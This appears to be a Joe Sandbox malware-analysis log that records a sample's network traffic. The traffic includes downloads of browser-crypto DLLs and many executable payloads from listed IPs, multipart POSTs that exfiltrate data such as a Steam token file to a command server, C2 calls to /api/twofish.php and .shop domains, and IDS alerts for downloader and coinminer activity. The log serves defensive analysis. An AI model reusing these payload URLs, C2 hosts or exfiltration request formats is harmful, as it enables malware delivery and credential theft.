Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1Host: 147.45.68.138Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAFHost: 147.45.68.138Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHJJKFCAAFHJKFBKKHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 33 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 4a 4a 4b 46 43 41 41 46 48 4a 4b 46 42 4b 4b 2d 2d 0d 0a Data Ascii: ------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------HCAEHJJKFCAAFHJKFBKKContent-Disposition: form-data; name="mode"3------HCAEHJJKFCAAFHJKFBKK--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGDBFIJKEBGIDGDHCGCHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 44 42 46 49 4a 4b 45 42 47 49 44 47 44 48 43 47 43 2d 2d 0d 0a Data Ascii: ------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------KEGDBFIJKEBGIDGDHCGCContent-Disposition: form-data; name="mode"4------KEGDBFIJKEBGIDGDHCGC--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBFHJDHJJKFIDBGIJHost: 147.45.68.138Content-Length: 461Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 55 32 39 6d 64 46 78 54 64 47 56 68 62 56 78 7a 64 47 56 68 62 56 39 30 62 32 74 6c 62 6e 4d 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 31 39 36 6d 55 77 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 47 43 42 46 48 4a 44 48 4a 4a 4b 46 49 44 42 47 49 4a 2d 2d 0d 0a Data Ascii: ------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_name"U29mdFxTdGVhbVxzdGVhbV90b2tlbnMudHh0------IEGCBFHJDHJJKFIDBGIJContent-Disposition: form-data; name="file_data"196mUw==------IEGCBFHJDHJJKFIDBGIJ--
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKEHDBAEGIIIEBGCAAFHHost: 147.45.68.138Content-Length: 130725Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGHCBKKKFHCGCBFIJEHDHost: 147.45.68.138Content-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 35 64 62 32 32 31 62 65 38 65 66 63 36 31 66 63 62 32 64 66 62 64 62 31 61 64 32 64 30 38 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 65 65 62 35 64 66 66 31 64 34 37 39 64 30 38 32 66 37 37 66 32 63 39 30 31 37 63 33 62 66 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 35 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 43 42 4b 4b 4b 46 48 43 47 43 42 46 49 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="token"d55db221be8efc61fcb2dfbdb1ad2d08------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="build_id"6eeb5dff1d479d082f77f2c9017c3bf5------EGHCBKKKFHCGCBFIJEHDContent-Disposition: form-data; name="mode"5------EGHCBKKKFHCGCBFIJEHD--
Source: global traffic HTTP traffic detected: GET /prog/66d7077a2064d_l.exe HTTP/1.1Host: 147.45.44.104Cache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 46.8.231.109 46.8.231.109
Source: Joe Sandbox View IP Address: 185.215.113.100 185.215.113.100
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
May check the online IP address of the machine
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: iplogger.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49717 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49719 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49726 -> 154.216.17.178:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49718 -> 31.41.244.9:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49730 -> 176.111.174.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53026 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53042 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:55645 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:53051 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49725 -> 76.76.21.98:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=GqSSlkptWTmvyJO2hxi0bll8qizelqUeJLuZKZ_yI20-1725464264-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=U.nX0IS3oJ70BnB5OMDCq_TanB01xh8k8GEzNt1lp9o-1725464265-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=jncs3kGgV1cnnvz_z.raDYbdJfAkkaPbvt1he_gGuTo-1725464275-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=kC4IYwSAX30bx5L_n1ZLbZ5j4TskBRPpBti46V6lABM-1725464304-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 62.133.61.172
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172Data Raw: 64 61 74 61 3d 73 77 67 55 36 57 6f 66 31 70 38 45 35 49 47 71 49 76 61 37 46 53 54 4e 64 64 57 50 4a 32 50 52 57 52 5f 7a 46 71 73 41 74 65 4f 5a 38 6b 56 68 77 30 46 2d 30 6b 51 48 4a 31 46 70 6e 4b 74 5f 64 66 62 31 73 50 5f 79 6a 33 77 55 6f 54 2d 72 74 6a 5f 57 41 49 6b 6f 79 4f 4e 64 6d 5f 34 34 5f 78 4f 58 57 56 52 4c 35 4f 62 4c 79 78 52 42 46 2d 48 4d 65 69 65 61 76 47 4a 34 4b 45 34 70 Data Ascii: data=swgU6Wof1p8E5IGqIva7FSTNddWPJ2PRWR_zFqsAteOZ8kVhw0F-0kQHJ1FpnKt_dfb1sP_yj3wUoT-rtj_WAIkoyONdm_44_xOXWVRL5ObLyxRBF-HMeieavGJ4KE4p
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 62.133.61.172
Source: global traffic HTTP traffic detected: HEAD /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70775c548d_v.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d58b1858bcb_crypted.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /edge/msconfig32.exe#pend HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 154.216.17.178Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d707730e9bf_s.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d72df86b9f3_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d60cd3ce002_SeparatelyDied.exe#sun HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 62.133.61.172
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 154.216.17.178
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
